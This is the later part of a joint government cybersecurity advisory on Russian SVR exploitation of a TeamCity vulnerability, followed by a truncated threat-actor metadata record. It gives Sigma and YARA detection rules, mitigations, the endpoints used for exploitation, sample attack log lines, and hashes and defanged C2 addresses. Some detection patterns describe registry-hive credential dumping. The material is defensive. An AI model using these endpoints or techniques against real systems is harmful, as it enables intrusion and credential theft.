administrator\r\ntitle: Compressing files from temp to temp\r\ndescription: Compressing files from temp\\ to temp used by SVR to prepare data to be exfiltrated\r\nreferences:\r\nauthor:\r\ndate: 2023/11/15\r\nlogsource:\r\n category: ps_script\r\n product: windows\r\ndetection:\r\n selection:\r\n ScriptBlockText|re: '.*Compress\\-Archive.*Path.*Windows\\\\[Tt]{1}emp\\\\[1-9]\r\n{1}.*DestinationPath.*Windows\\\\[Tt]{1}emp\\\\.*'\r\n condition: selection\r\ntitle: DLL names used by SVR for GraphicalProton backdoor\r\ndescription: Hunts for known SVR-specific DLL names.\r\nreferences:\r\nauthor:\r\ndate: 2023/11/15\r\nlogsource:\r\n category: image_load\r\n product: windows\r\ndetection:\r\n selection:\r\n ImageLoaded|endswith:\r\n - 'AclNumsInvertHost.dll'\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\r\nPage 15 of 25\n\n- 'ModeBitmapNumericAnimate.dll'\r\n- 'UnregisterAncestorAppendAuto.dll'\r\n - 'DeregisterSeekUsers.dll'\r\n - 'ScrollbarHandleGet.dll'\r\n - 'PerformanceCaptionApi.dll'\r\n - 'WowIcmpRemoveReg.dll'\r\n - 'BlendMonitorStringBuild.dll'\r\n - 'HandleFrequencyAll.dll'\r\n - 'HardSwapColor.dll'\r\n - 'LengthInMemoryActivate.dll'\r\n - 'ParametersNamesPopup.dll'\r\n - 'ModeFolderSignMove.dll'\r\n - 'ChildPaletteConnected.dll'\r\n - 'AddressResourcesSpec.dll'\r\n condition: selection\r\ntitle: Sensitive registry entries saved to file\r\ndescription: Sensitive registry entries saved to file\r\nauthor:\r\nreferences:\r\ndate: 2023/11/15\r\nlogsource:\r\n category: process_creation\r\n product: windows\r\ndetection:\r\n selection_base:\r\n Image|endswith:\r\n - 'reg.exe'\r\n CommandLine|contains: 'save'\r\n CommandLine|re: '.*HKLM\\\\SYSTEM.*|.*HKLM\\\\SECURITY.*|.*HKLM\\\\SAM.*'\r\n selection_file:\r\n CommandLine|re: '.*sy\\.sa.*|.*sam\\.sa.*|.*se\\.sa.*'\r\n condition: selection_base and selection_file\r\ntitle: Scheduled tasks names used by SVR for GraphicalProton backdoor\r\ndescription: Hunts for known SVR-specific scheduled task names\r\nauthor:\r\nreferences:\r\ndate: 2023/11/15\r\nlogsource:\r\n category: taskscheduler\r\n product: windows\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\r\nPage 16 of 25\n\ndetection:\r\nselection:\r\n EventID:\r\n - 4698\r\n - 4699\r\n - 4702\r\n TaskName:\r\n - '\\Microsoft\\Windows\\IISUpdateService'\r\n - '\\Microsoft\\Windows\\WindowsDefenderService'\r\n - '\\Microsoft\\Windows\\WindowsDefenderService2'\r\n - '\\Microsoft\\DefenderService'\r\n - '\\Microsoft\\Windows\\DefenderUPDService'\r\n - '\\Microsoft\\Windows\\WiMSDFS'\r\n - '\\Microsoft\\Windows\\Application Experience\\StartupAppTaskCkeck'\r\n - '\\Microsoft\\Windows\\Windows Error Reporting\\SubmitReporting'\r\n - '\\Microsoft\\Windows\\Windows Defender\\Defender Update Service'\r\n - '\\WindowUpdate'\r\n - '\\Microsoft\\Windows\\Windows Error Reporting\\CheckReporting'\r\n - '\\Microsoft\\Windows\\Application Experience\\StartupAppTaskCheck'\r\n - '\\Microsoft\\Windows\\Speech\\SpeechModelInstallTask'\r\n - '\\Microsoft\\Windows\\Windows Filtering Platform\\BfeOnServiceStart'\r\n - '\\Microsoft\\Windows\\Data Integrity Scan\\Data Integrity Update'\r\n - '\\Microsoft\\Windows\\WindowsUpdate\\Scheduled AutoCheck'\r\n - '\\Microsoft\\Windows\\ATPUpd'\r\n - '\\Microsoft\\Windows\\Windows Defender\\Service Update'\r\n - '\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Check'\r\n - '\\Microsoft\\Windows\\WindowsUpdate\\Scheduled AutoCheck'\r\n - '\\Defender'\r\n - '\\defender'\r\n - '\\\\Microsoft\\\\Windows\\\\IISUpdateService'\r\n - '\\\\Microsoft\\\\Windows\\\\WindowsDefenderService'\r\n - '\\\\Microsoft\\\\Windows\\\\WindowsDefenderService2'\r\n - '\\\\Microsoft\\\\DefenderService'\r\n - '\\\\Microsoft\\\\Windows\\\\DefenderUPDService'\r\n - '\\\\Microsoft\\\\Windows\\\\WiMSDFS'\r\n - '\\\\Microsoft\\\\Windows\\\\Application Experience\\\\StartupAppTaskCkeck'\r\n - '\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\SubmitReporting'\r\n - '\\\\Microsoft\\\\Windows\\\\Windows Defender\\\\Defender Update Service'\r\n - '\\\\WindowUpdate'\r\n - '\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\CheckReporting'\r\n - '\\\\Microsoft\\\\Windows\\\\Application Experience\\\\StartupAppTaskCheck'\r\n - '\\\\Microsoft\\\\Windows\\\\Speech\\\\SpeechModelInstallTask'\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\r\nPage 17 of 25\n\n- '\\\\Microsoft\\\\Windows\\\\Windows Filtering Platform\\\\BfeOnServiceStart'\r\n- '\\\\Microsoft\\\\Windows\\\\Data Integrity Scan\\Data Integrity Update'\r\n - '\\\\Microsoft\\\\Windows\\\\WindowsUpdate\\\\Scheduled AutoCheck'\r\n - '\\\\Microsoft\\\\Windows\\\\ATPUpd'\r\n - '\\\\Microsoft\\\\Windows\\\\Windows Defender\\\\Service Update'\r\n - '\\\\Microsoft\\\\Windows\\\\WindowsUpdate\\\\Scheduled Check'\r\n - '\\\\Microsoft\\\\Windows\\\\WindowsUpdate\\\\Scheduled AutoCheck'\r\n - '\\\\Defender'\r\n - '\\\\defender'\r\n condition: selection\r\ntitle: Scheduled tasks names used by SVR for GraphicalProton backdoor\r\ndescription: Hunts for known SVR-specific scheduled task names\r\nauthor:\r\nreferences:\r\ndate: 2023/11/15\r\nlogsource:\r\n category: process_creation\r\n product: windows\r\ndetection:\r\n selection:\r\n Image|endswith:\r\n - 'schtasks.exe'\r\n CommandLine|contains:\r\n - 'IISUpdateService'\r\n - 'WindowsDefenderService'\r\n - 'WindowsDefenderService2'\r\n - 'DefenderService'\r\n - 'DefenderUPDService'\r\n - 'WiMSDFS'\r\n - 'StartupAppTaskCkeck'\r\n - 'SubmitReporting'\r\n - 'Defender Update Service'\r\n - 'WindowUpdate'\r\n - 'CheckReporting'\r\n - 'StartupAppTaskCheck'\r\n - 'SpeechModelInstallTask'\r\n - 'BfeOnServiceStart'\r\n - 'Data Integrity Update'\r\n - 'Scheduled AutoCheck'\r\n - 'ATPUpd'\r\n - 'Service Update'\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\r\nPage 18 of 25\n\n- 'Scheduled Check'\r\n- 'Scheduled AutoCheck'\r\n - 'Defender'\r\n - 'defender'\r\n selection_re:\r\n Image|endswith:\r\n - 'schtasks.exe'\r\n CommandLine|re:\r\n - '.*Defender\\sUpdate\\sService.*'\r\n - '.*Data\\sIntegrity\\sUpdate.*'\r\n - '.*Scheduled\\sAutoCheck.*'\r\n - '.*Service\\sUpdate.*'\r\n - '.*Scheduled\\sCheck.*'\r\n - '.*Scheduled\\sAutoCheck.*'\r\n condition: selection or selection_re\r\ntitle: Suspicious registry modifications\r\ndescription: Suspicious registry modifications\r\nauthor:\r\nreferences:\r\ndate: 2023/11/15\r\nlogsource:\r\n category: registry_set\r\n product: windows\r\ndetection:\r\n selection:\r\n EventID: 4657\r\n TargetObject|contains:\r\n - 'CurrentControlSet\\\\Control\\\\Lsa\\\\DisableRestrictedAdmin'\r\n - 'CurrentControlSet\\\\Control\\\\Lsa\\\\NoLMHash'\r\n condition: selection\r\ntitle: Registry modification from cmd\r\ndescription: Registry modification from cmd\r\nauthor:\r\nreferences:\r\ndate: 2023/11/15\r\nlogsource:\r\n category: process_creation\r\n product: windows\r\ndetection:\r\n selection:\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\r\nPage 19 of 25\n\nImage|endswith:\r\n- 'reg.exe'\r\n CommandLine|contains|all:\r\n - 'CurrentControlSet'\r\n - 'Lsa'\r\n CommandLine|contains:\r\n - 'DisableRestrictedAdmin'\r\n - 'NoLMHash'\r\n condition: selection\r\ntitle: Malicious Driver Load\r\ndescription: Detects the load of known malicious drivers via their names or hash.\r\nreferences:\r\n - https://github.com/wavestone-cdt/EDRSandblast#edr-drivers-and-processes-detection\r\nauthor:\r\ndate: 2023/11/15\r\nlogsource:\r\n category: driver_load\r\n product: windows\r\ndetection:\r\n selection_name:\r\n ImageLoaded|endswith:\r\n - 'RTCore64.sys'\r\n - 'DBUtils_2_3.sys'\r\n selection_hash:\r\n Hashes|contains:\r\n - '01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd'\r\n - '0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5'\r\n condition: selection_name or selection_hash\r\nYARA rules\r\nThe following rule detects most known GraphicalProton variants.\r\nrule APT29_GraphicalProton {\r\n strings:\r\n // C1 E9 1B shr ecx, 1Bh\r\n // 48 8B 44 24 08 mov rax, [rsp+30h+var_28]\r\n // 8B 50 04 mov edx, [rax+4]\r\n // C1 E2 05 shl edx, 5\r\n // 09 D1 or ecx, edx\r\n // 48 8B 44 24 08 mov rax, [rsp+30h+var_28]\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\r\nPage 20 of 25\n\n$op_string_crypt = { c1 e? (1b | 18 | 10 | 13 | 19 | 10) 48 [4] 8b [2] c1 e? (05 | 08 | 10 |\r\n0d | 07) 09 ?? 48 }\r\n // 48 05 20 00 00 00 add rax, 20h ; ' '\r\n // 48 89 C1 mov rcx, rax\r\n // 48 8D 15 0A A6 0D 00 lea rdx, unk_14011E546\r\n // 41 B8 30 00 00 00 mov r8d, 30h ; '0'\r\n // E8 69 B5 FE FF call sub_14002F4B0\r\n // 48 8B 44 24 30 mov rax, [rsp+88h+var_58]\r\n // 48 05 40 00 00 00 add rax, 40h ; '@'\r\n // 48 89 C1 mov rcx, rax\r\n // 48 8D 15 1B A6 0D 00 lea rdx, unk_14011E577\r\n // 41 B8 70 01 00 00 mov r8d, 170h\r\n // E8 49 B5 FE FF call sub_14002F4B0\r\n // 48 8B 44 24 30 mov rax, [rsp+88h+var_58]\r\n // 48 05 60 00 00 00 add rax, 60h ; '`'\r\n // 48 89 C1 mov rcx, rax\r\n // 48 8D 15 6C A7 0D 00 lea rdx, unk_14011E6E8\r\n // 41 B8 2F 00 00 00 mov r8d, 2Fh ; '/'\r\n // E8 29 B5 FE FF call sub_14002F4B0\r\n // 48 8B 44 24 30 mov rax, [rsp+88h+var_58]\r\n // 48 05 80 00 00 00 add rax, 80h\r\n // 48 89 C1 mov rcx, rax\r\n // 48 8D 15 7C A7 0D 00 lea rdx, unk_14011E718\r\n // 41 B8 2F 00 00 00 mov r8d, 2Fh ; '/'\r\n // E8 09 B5 FE FF call sub_14002F4B0\r\n // 48 8B 44 24 30 mov rax, [rsp+88h+var_58]\r\n // 48 05 A0 00 00 00 add rax, 0A0h\r\n $op_decrypt_config = {\r\n 48 05 20 00 00 00 48 89 C1 48 [6] 41 B8 ?? ?? 00 00 E8 [4] 48 [4]\r\n 48 05 40 00 00 00 48 89 C1 48 [6] 41 B8 ?? ?? 00 00 E8 [4] 48 [4]\r\n 48 05 60 00 00 00 48 89 C1 48 [6] 41 B8 ?? ?? 00 00 E8 [4] 48 [4]\r\n 48 05 80 00 00 00 48 89 C1 48 [6] 41 B8 ?? ?? 00 00 E8 [4] 48 [4]\r\n 48 05 A0 00 00 00\r\n }\r\n condition:\r\n all of them\r\n}\r\nNote: These rules are meant for threat hunting and have not been tested on a larger dataset.\r\nMITIGATIONS\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\r\nPage 21 of 25\n\nThe FBI, CISA, NSA, SKW, CERT Polska, and NCSC assess the scope and indiscriminate targeting of this\r\ncampaign poses a threat to public safety and recommend organizations implement the mitigations below to\r\nimprove organization’s cybersecurity posture. These mitigations align with the Cross-Sector Cybersecurity\r\nPerformance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST).\r\nThe CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations\r\nimplement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against\r\nthe most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector\r\nCybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline\r\nprotections.\r\nApply available patches for CVE-2023-42793 issued by JetBrains TeamCity in mid-September 2023, if\r\nnot already completed.\r\nMonitor the network for evidence of encoded commands and execution of network scanning tools.\r\nEnsure host-based anti-virus/endpoint monitoring solutions are enabled and set to alert if monitoring\r\nor reporting is disabled, or if communication is lost with a host agent for more than a reasonable amount of\r\ntime.\r\nRequire use of multi-factor authentication [CPG 1.3] for all services to the extent possible, particularly\r\nfor email, virtual private networks, and accounts that access critical systems.\r\nOrganizations should adopt multi-factor authentication (MFA) as an additional layer of security for\r\nall users with access to sensitive data. Enabling MFA significantly reduces the risk of unauthorized\r\naccess, even if passwords are compromised.\r\nKeep all operating systems, software, and firmware up to date. Immediately configure newly-added\r\nsystems to the network, including those used for testing or development work, to follow the organization’s\r\nsecurity baseline and incorporate into enterprise monitoring tools.\r\nAudit log files to identify attempts to access privileged certificates and creation of fake identity providers.\r\nDeploy software to identify suspicious behavior on systems.\r\nDeploy endpoint protection systems with the ability to monitor for behavioral indicators of compromise.\r\nUse available public resources to identify credential abuse with cloud environments.\r\nConfigure authentication mechanisms to confirm certain user activities on systems, including registering\r\nnew devices.\r\nVALIDATE SECURITY CONTROLS\r\nIn addition to applying mitigations, FBI, CISA, NSA, SKW, CERT Polska, and NCSC recommend exercising,\r\ntesting, and validating your organization's security program against the threat behaviors mapped to the MITRE\r\nATT\u0026CK for Enterprise framework in this advisory. FBI, CISA, NSA, SKW, CERT Polska, and NCSC\r\nrecommend testing your existing security controls inventory to assess how they perform against the ATT\u0026CK\r\ntechniques described in this advisory.\r\nTo get started:\r\n1. Select an ATT\u0026CK technique described in this advisory (see previous tables).\r\n2. Align your security technologies against the technique.\r\n3. Test your technologies against the technique.\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\r\nPage 22 of 25\n\n4. Analyze your detection and prevention technologies’ performance.\r\n5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.\r\n6. Tune your security program, including people, processes, and technologies, based on the data generated by\r\nthis process.\r\nFBI, CISA, NSA, SKW, CERT Polska, and NCSC recommend continually testing your security program, at scale,\r\nin a production environment to ensure optimal performance against the MITRE ATT\u0026CK techniques identified in\r\nthis advisory.\r\nREFERENCES\r\nFBI, DHS, CISA, Joint Cyber Security Advisory, Russian Foreign Intelligence Service (SVR) Cyber\r\nOperations: Trends and Best Practices for Network Defenders\r\nNSA, CISA, FBI, Joint Cyber Security Advisory, Russian SVR Targets U.S. and Allied Networks\r\nCISA, Remediating Networks Affected by the Solarwinds and Active Directory/M365 Compromise\r\nCISA, Alert (AA21-008A), Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments\r\nCISA, Alert (AA20-352A), Advanced Persistent Threat Compromise of Government Agencies, Critical\r\nInfrastructure, and Private Sector Organizations\r\nCISA, CISA Insights, What Every Leader Needs to Know About the Ongoing APT Cyber Activity\r\nFBI, CISA, Joint Cybersecurity Advisory, Advanced Persistent Threat Actors Targeting U.S. Think Tanks\r\nCISA, Malicious Activity Targeting COVID-19 Research, Vaccine Development\r\nNCSC, CSE, NSA, CISA, Advisory: APT 29 Targets COVID-19 Vaccine Development\r\nThe information in this report is being provided “as is” for informational purposes only. FBI, CISA, NSA, SKW,\r\nCERT Polska, and NCSC do not endorse any commercial entity, product, company, or service, including any\r\nentities, products, or services linked within this document. Any reference to specific commercial entities, products,\r\nprocesses, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply\r\nendorsement, recommendation, or favoring by FBI, CISA, NSA, SKW, CERT Polska, and NCSC.\r\nVERSION HISTORY\r\nDecember 12, 2023: Initial version.\r\nAPPENDIX A – INDICATORS OF COMPROMISE CVE-2023-42793\r\nOn a Windows system, the log file C:\\TeamCity\\logs\\teamcity-server.log will contain a log message when an\r\nattacker modified the internal.properties file. There will also be a log message for every process created via\r\nthe /app/rest/debug/processes endpoint. In addition to showing the command line used, the user ID of the user\r\naccount whose authentication token was used during the attack is also shown. For example:\r\n[2023-09-26 11:53:46,970] INFO - ntrollers.FileBrowseController - File edited:\r\nC:\\ProgramData\\JetBrains\\TeamCity\\config\\internal.properties by user with id=1\r\n[2023-09-26 11:53:46,970] INFO - s.buildServer.ACTIVITIES.AUDIT - server_file_change: File\r\nC:\\ProgramData\\JetBrains\\TeamCity\\config\\internal.properties was modified by \"user with id=1\"\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\r\nPage 23 of 25\n\n[2023-09-26 11:53:58,227] INFO - tbrains.buildServer.ACTIVITIES - External process is launched by\r\nuser user with id=1. Command line: cmd.exe \"/c whoami\"\r\nAn attacker may attempt to cover their tracks by wiping this log file. It does not appear that TeamCity logs\r\nindividual HTTP requests, but if TeamCity is configured to sit behind a HTTP proxy , the HTTP proxy may have\r\nsuitable logs showing the following target endpoints being accessed:\r\n/app/rest/users/id:1/tokens/RPC2 – This endpoint is required to exploit the vulnerability.\r\n/app/rest/users – This endpoint is only required if the attacker wishes to create an arbitrary user.\r\n/app/rest/debug/processes – This endpoint is only required if the attacker wishes to create an arbitrary\r\nprocess.\r\nNote: The user ID value may be higher than 1.\r\nAPPENDIX B – IOCS\r\nFile IoCs\r\nGraphicalProton backdoor:\r\n01B5F7094DE0B2C6F8E28AA9A2DED678C166D615530E595621E692A9C0240732\r\n34C8F155601A3948DDB0D60B582CFE87DE970D443CC0E05DF48B1A1AD2E42B5E\r\n620D2BF14FE345EEF618FDD1DAC242B3A0BB65CCB75699FE00F7C671F2C1D869\r\n773F0102720AF2957859D6930CD09693824D87DB705B3303CEF9EE794375CE13\r\n7B666B978DBBE7C032CEF19A90993E8E4922B743EE839632BFA6D99314EA6C53\r\n8AFB71B7CE511B0BCE642F46D6FC5DD79FAD86A58223061B684313966EFEF9C7\r\n971F0CED6C42DD2B6E3EA3E6C54D0081CF9B06E79A38C2EDE3A2C5228C27A6DC\r\nCB83E5CB264161C28DE76A44D0EDB450745E773D24BEC5869D85F69633E44DCF\r\nCD3584D61C2724F927553770924149BB51811742A461146B15B34A26C92CAD43\r\nEBE231C90FAD02590FC56D5840ACC63B90312B0E2FEE7DA3C7606027ED92600E\r\nF1B40E6E5A7CBC22F7A0BD34607B13E7E3493B8AAD7431C47F1366F0256E23EB\r\nC7B01242D2E15C3DA0F45B8ADEC4E6913E534849CDE16A2A6C480045E03FBEE4\r\n4BF1915785D7C6E0987EB9C15857F7AC67DC365177A1707B14822131D43A6166\r\nGraphicalProton HTTPS backdoor:\r\n18101518EAE3EEC6EBE453DE4C4C380160774D7C3ED5C79E1813013AC1BB0B93\r\n19F1EF66E449CF2A2B0283DBB756850CCA396114286E1485E35E6C672C9C3641\r\n1E74CF0223D57FD846E171F4A58790280D4593DF1F23132044076560A5455FF8\r\n219FB90D2E88A2197A9E08B0E7811E2E0BD23D59233287587CCC4642C2CF3D67\r\n92C7693E82A90D08249EDEAFBCA6533FED81B62E9E056DEC34C24756E0A130A6\r\nB53E27C79EED8531B1E05827ACE2362603FB9F77F53CEE2E34940D570217CBF7\r\nC37C109171F32456BBE57B8676CC533091E387E6BA733FBAA01175C43CFB6EBD\r\nC40A8006A7B1F10B1B42FDD8D6D0F434BE503FB3400FB948AC9AB8DDFA5B78A0\r\nC832462C15C8041191F190F7A88D25089D57F78E97161C3003D68D0CC2C4BAA3\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\r\nPage 24 of 25\n\nF6194121E1540C3553273709127DFA1DAAB96B0ACFAB6E92548BFB4059913C69\r\nBackdoored vcperf:\r\nD724728344FCF3812A0664A80270F7B4980B82342449A8C5A2FA510E10600443\r\nBackdoored Zabbix installation archive:\r\n4EE70128C70D646C5C2A9A17AD05949CB1FBF1043E9D671998812B2DCE75CF0F\r\nBackdoored Webroot AV installation archive:\r\n950ADBAF66AB214DE837E6F1C00921C501746616A882EA8C42F1BAD5F9B6EFF4\r\nModified rsockstun\r\nCB83E5CB264161C28DE76A44D0EDB450745E773D24BEC5869D85F69633E44DCF\r\nNetwork IoCs\r\nTunnel Endpoints\r\n65.20.97[.]203\r\n65.21.51[.]58\r\nExploitation Server\r\n103.76.128[.]34\r\nGraphicalProton HTTPS C2 URL:\r\nhxxps://matclick[.]com/wp-query[.]php\r\nSource: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\r\nPage 25 of 25", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "references": [ "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a" ], "report_names": [ "aa23-347a" ], "threat_actors": [ { "id": "b43e5ea9-d8c8-4efa-b5bf-f1efb37174ba", "created_at": "2022-10-25T16:07:24.36191Z", "updated_at": "2026-04-10T02:00:04.954902Z", "deleted_at": null, "main_name": "UNC2452", "aliases": [ "Dark Halo", "Nobelium", "SolarStorm", "StellarParticle", "UNC2452" ], "source_name": "ETDA:UNC2452", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "1d3f9dec-b033-48a5-8b1e-f67a29429e89", "created_at": "2022-10-25T15:50:23.739197Z", "updated_at": "2026-04-10T02:00:05.275809Z", "deleted_at": null, "main_name": "UNC2452", "aliases": [ "UNC2452", "NOBELIUM", "StellarParticle", "Dark Halo" ], "source_name": "MITRE:UNC2452", "tools": [ "Sibot", "Mimikatz", "Cobalt Strike", "AdFind", "GoldMax" ], "source_id": "MITRE", "reports": null }, { "id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e", "created_at": "2024-06-04T02:03:07.956135Z", "updated_at": "2026-04-10T02:00:03.689959Z", "deleted_at": null, "main_name": "IRON HEMLOCK", "aliases": [ "APT29 ", "ATK7 ", "Blue Kitsune ", "Cozy Bear ", "The Dukes", "UNC2452 ", "YTTRIUM " ], "source_name": "Secureworks:IRON HEMLOCK", "tools": [ "CosmicDuke", "CozyCar", "CozyDuke", "DiefenDuke", "FatDuke", "HAMMERTOSS", "LiteDuke", "MiniDuke", "OnionDuke", "PolyglotDuke", "RegDuke", "RegDuke Loader", "SeaDuke", "Sliver" ], "source_id": "Secureworks", "reports": null }, { "id": "a241a1ca-2bc9-450b-a07b-aae747ee2710", "created_at": "2024-06-19T02:03:08.150052Z", "updated_at": "2026-04-10T02:00:03.737173Z", "deleted_at": null, "main_name": "IRON RITUAL", "aliases": [ "APT29", "Blue Dev 5 ", "BlueBravo ", "Cloaked Ursa ", "CozyLarch ", "Dark Halo ", "Midnight Blizzard ", "NOBELIUM ", "StellarParticle ", "UNC2452 " ], "source_name": "Secureworks:IRON RITUAL", "tools": [ "Brute Ratel C4", "Cobalt Strike", "EnvyScout", "GoldFinder", "GoldMax", "NativeZone", "RAINDROP", "SUNBURST", "Sibot", "TEARDROP", "VaporRage" ], "source_id": "Secureworks", "reports": null }, { "id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb", "created_at": "2023-01-06T13:46:38.393409Z", "updated_at": "2026-04-10T02:00:02.955738Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "Cloaked Ursa", "TA421", "Blue Kitsune", "BlueBravo", "IRON HEMLOCK", "G0016", "Nobelium", "Group 100", "YTTRIUM", "Grizzly Steppe", "ATK7", "ITG11", "COZY BEAR", "The Dukes", "Minidionis", "UAC-0029", "SeaDuke" ], "source_name": "MISPGALAXY:APT29", "tools": [ "SNOWYAMBER", "HALFRIG", "QUARTERRIG" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "70872c3a-e788-4b55-a7d6-b2df52001ad0", "created_at": "2023-01-06T13:46:39.18401Z", "updated_at": "2026-04-10T02:00:03.239111Z", "deleted_at": null, "main_name": "UNC2452", "aliases": [ "DarkHalo", "StellarParticle", "NOBELIUM", "Solar Phoenix", "Midnight Blizzard" ], "source_name": "MISPGALAXY:UNC2452", "tools": [ "SNOWYAMBER", "HALFRIG", "QUARTERRIG" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a", "created_at": "2022-10-25T15:50:23.548494Z", "updated_at": "2026-04-10T02:00:05.292748Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "APT29", "IRON RITUAL", "IRON HEMLOCK", "NobleBaron", "Dark Halo", "NOBELIUM", "UNC2452", "YTTRIUM", "The Dukes", "Cozy Bear", "CozyDuke", "SolarStorm", "Blue Kitsune", "UNC3524", "Midnight Blizzard" ], "source_name": "MITRE:APT29", "tools": [ "PinchDuke", "ROADTools", "WellMail", "CozyCar", "Mimikatz", "Tasklist", "OnionDuke", "FatDuke", "POSHSPY", "EnvyScout", "SoreFang", "GeminiDuke", "reGeorg", "GoldMax", "FoggyWeb", "SDelete", "PolyglotDuke", "AADInternals", "MiniDuke", "SeaDuke", "Sibot", "RegDuke", "CloudDuke", "GoldFinder", "AdFind", "PsExec", "NativeZone", "Systeminfo", "ipconfig", "Impacket", "Cobalt Strike", "PowerDuke", "QUIETEXIT", "HAMMERTOSS", "BoomBox", "CosmicDuke", "WellMess", "VaporRage", "LiteDuke" ], "source_id": "MITRE", "reports": null }, { "id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab", "created_at": "2022-10-25T16:07:24.212584Z", "updated_at": "2026-04-10T02:00:04.900038Z", "deleted_at": null, "main_name": "Sofacy", "aliases": [ "APT 28", "ATK 5", "Blue Athena", "BlueDelta", "FROZENLAKE", "Fancy Bear", "Fighting Ursa", "Forest Blizzard", "G0007", "Grey-Cloud", "Grizzly Steppe", "Group 74", "GruesomeLarch", "ITG05", "Iron Twilight", "Operation DealersChoice", "Operation Dear Joohn", "Operation Komplex", "Operation Pawn Storm", "Operation RoundPress", "Operation Russian Doll", "Operation Steal-It", "Pawn Storm", "SIG40", "Sednit", "Snakemackerel", "Sofacy", "Strontium", "T-APT-12", "TA422", "TAG-0700", "TAG-110", "TG-4127", "Tsar Team", "UAC-0028", "UAC-0063" ], "source_name": "ETDA:Sofacy", "tools": [ "ADVSTORESHELL", "AZZY", "Backdoor.SofacyX", "CHERRYSPY", "CORESHELL", "Carberp", "Computrace", "DealersChoice", "Delphacy", "Downdelph", "Downrage", "Drovorub", "EVILTOSS", "Foozer", "GAMEFISH", "GooseEgg", "Graphite", "HATVIBE", "HIDEDRV", "Headlace", "Impacket", "JHUHUGIT", "JKEYSKW", "Koadic", "Komplex", "LOLBAS", "LOLBins", "Living off the Land", "LoJack", "LoJax", "MASEPIE", "Mimikatz", "NETUI", "Nimcy", "OCEANMAP", "OLDBAIT", "PocoDown", "PocoDownloader", "Popr-d30", "ProcDump", "PythocyDbg", "SMBExec", "SOURFACE", "SPLM", "STEELHOOK", "Sasfis", "Sedkit", "Sednit", "Sedreco", "Seduploader", "Shunnael", "SkinnyBoy", "Sofacy", "SofacyCarberp", "SpiderLabs Responder", "Trojan.Shunnael", "Trojan.Sofacy", "USB Stealer", "USBStealer", "VPNFilter", "Win32/USBStealer", "WinIDS", "Winexe", "X-Agent", "X-Tunnel", "XAPS", "XTunnel", "Xagent", "Zebrocy", "Zekapab", "carberplike", "certutil", "certutil.exe", "fysbis", "webhp" ], "source_id": "ETDA", "reports": null }, { "id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270", "created_at": "2022-10-25T16:07:23.341684Z", "updated_at": "2026-04-10T02:00:04.549917Z", "deleted_at": null, "main_name": "APT 29", "aliases": [ "APT 29", "ATK 7", "Blue Dev 5", "BlueBravo", "Cloaked Ursa", "CloudLook", "Cozy Bear", "Dark Halo", "Earth Koshchei", "G0016", "Grizzly Steppe", "Group 100", "ITG11", "Iron Hemlock", "Iron Ritual", "Midnight Blizzard", "Minidionis", "Nobelium", "NobleBaron", "Operation Ghost", "Operation Office monkeys", "Operation StellarParticle", "SilverFish", "Solar Phoenix", "SolarStorm", "StellarParticle", "TEMP.Monkeys", "The Dukes", "UNC2452", "UNC3524", "Yttrium" ], "source_name": "ETDA:APT 29", "tools": [ "7-Zip", "ATI-Agent", "AdFind", "Agentemis", "AtNow", "BEATDROP", "BotgenStudios", "CEELOADER", "Cloud Duke", "CloudDuke", "CloudLook", "Cobalt Strike", "CobaltStrike", "CosmicDuke", "Cozer", "CozyBear", "CozyCar", "CozyDuke", "Danfuan", "EnvyScout", "EuroAPT", "FatDuke", "FoggyWeb", "GeminiDuke", "Geppei", "GoldFinder", "GoldMax", "GraphDrop", "GraphicalNeutrino", "GraphicalProton", "HAMMERTOSS", "HammerDuke", "LOLBAS", "LOLBins", 